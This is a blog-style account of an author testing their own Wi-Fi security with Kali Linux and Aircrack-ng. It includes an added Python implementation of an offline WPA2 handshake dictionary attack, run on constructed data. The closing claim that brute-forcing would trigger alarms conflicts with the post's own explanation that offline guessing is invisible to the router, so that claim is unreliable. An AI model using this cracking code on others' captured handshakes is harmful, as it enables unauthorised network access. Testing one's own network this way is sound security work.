On Wednesday I was having a slow day, and, after hearing about other systems being hit with a web-based attack the previous day, I decided to see how easy it would be for someone to reach my server over the Wifi network.
I don't think I need to explain the damage a disgruntled person with enough Google skill could do by script-kiddie-ing their way in: flooding the network with traffic noise, or compromising your network or server.
This is where the grey IT art known as pentesting (penetration testing) comes in handy; it sits on the same line as offensive security. Most businesses still use wired connections for their workstations, but with tablets and laptops becoming more powerful there is a big shift to wireless offices and classrooms. To get on a wired network you have to be physically on the property, which is not ideal if you get caught and have trespassing added to the plethora of federal charges brought against you; it just doesn't seem worth the risk. Wifi is just a radio signal of a different nature, but it is still data sent through the air that can be pulled out, decoded and read.
The first line of defense in our own wireless security is that the SSID of the service network is not broadcast, but even that is not enough. Anyone who knows how to use a network sniffer can see a hidden wireless network whether the SSID is hidden or not, because the name still travels in the frames the clients send when they probe for and join it. The next line of defense is a strong Wifi password, which a client has to know before the router will let it on and give it a network address. This is the portion of our defense that I was testing.
The Setup:
Mine:
An Apple AirPort Extreme connected straight to the DSL line, with an AirPort Express in bridge mode. The reason for this setup is that it cuts down on service interruptions coming from the surrounding companies' "hot spots".
The Bad Guy:
An Acer Aspire from 2011 running Kali Linux with Aircrack-ng, a simple setup anyone can download from the almighty interwebs. No customization was done to the Kali Linux system.
Ok, so now on to the test. Our target system was picked up on a scan while the Bad Guy was sitting out in our parking lot trying to get free internet, curious why the network was hidden. He starts his attack box and begins capturing traffic going to and from the BSSID 00:24:36:A5:D7:7F (my router). What he needs is a WPA handshake, the exchange that takes place when a station (the computer trying to connect) authenticates to the BSSID (the router). The handshake never carries the password itself, but it does carry the nonces from both sides and an integrity check that is keyed from the password, which is enough for an attacker to test password guesses against it offline, at his leisure. That is like house locks; they only keep out the honest people. As you can see, with all the devices on the service network, getting a WPA handshake was easy. That is where the novice setting ended in this game.
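What the Bad Guy does with the captured handshake, as an added example that is not from the original post: the WPA2-PSK key schedule (PBKDF2 for the PMK, the 802.11i PRF-512 for the PTK, HMAC-SHA1 for the EAPOL-Key MIC) written out in Python and run as a dictionary attack, which is what Aircrack-ng does per candidate word. Nothing here is a real capture: the SSID, station MAC, nonces, wordlist and passphrases are constructed for the demo, and only the BSSID is the one named in the post. It also assumes WPA2 with key descriptor version 2 (the HMAC-SHA1 MIC), not the older WPA/TKIP variant.

```python
"""Offline dictionary attack against a (constructed) WPA2 4-way handshake.

Added example, not code from the original post.  The BSSID is the one the
post names; SSID, station MAC, nonces and passphrases are made up for the demo.
"""
import hashlib
import hmac
from typing import Iterable, Optional

SSID = "hidden-service-net"                 # assumed; the post never names it
AP_MAC = bytes.fromhex("002436A5D77F")      # BSSID from the post
STA_MAC = bytes.fromhex("001122334455")     # assumed client MAC
ANONCE = bytes(range(0, 32))                # constructed; real nonces are random per handshake
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81   # byte offset of the MIC field inside an EAPOL-Key frame (802.11i layout)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP). Field layout follows 802.11i."""
    body = (
        b"\x02"                  # descriptor type: RSN
        + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
        + b"\x00\x10"            # key length
        + b"\x00" * 7 + b"\x01"  # replay counter
        + snonce                 # 32-byte SNonce
        + b"\x00" * 16           # key IV
        + b"\x00" * 8            # key RSC
        + b"\x00" * 8            # key ID
        + mic                    # 16-byte MIC
        + b"\x00\x00"            # key data length (no RSN IE in this toy frame)
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 1, type Key


def capture_handshake(true_passphrase: str, anonce: bytes, snonce: bytes) -> bytes:
    """Stand-in for what the sniffer writes to the .cap: the station's msg 2 with its real MIC."""
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, anonce, snonce)[:16]   # KCK = first 16 bytes of PTK
    return build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))


def crack(frame: bytes, anonce: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Per candidate: PMK -> PTK -> MIC, compare with the captured MIC. Entirely offline."""
    snonce = frame[17:49]
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue   # not a legal WPA passphrase; skip the expensive PBKDF2
        pmk = pmk_from_passphrase(candidate, SSID)
        kck = derive_ptk(pmk, AP_MAC, STA_MAC, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


WORDLIST = ["password", "letmein1", "sunshine", "qwerty123", "iloveyou", "Tr0ub4dor&3"]  # constructed


def demo() -> tuple:
    """Weak passphrase falls to the wordlist; a long unguessable one does not."""
    weak = capture_handshake("sunshine", ANONCE, SNONCE)
    strong = capture_handshake("correct horse battery staple crossed the Rubicon", ANONCE, SNONCE)
    return crack(weak, ANONCE, WORDLIST), crack(strong, ANONCE, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

Every step after the capture runs against bytes on the attacker's disk, so the router never sees a single guess; what protects the network is only that each guess costs 4096 rounds of PBKDF2 and that the real passphrase is not in any wordlist. The same PMK derivation is why changing the SSID forces a rainbow table to be rebuilt: the SSID is the salt.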
My system survived without a breach. Now that's not to say you couldn't brute-force your way in, but that would cause alarms to go off.
So, thanks to a long, complex password, my server is safe. This is a good lesson.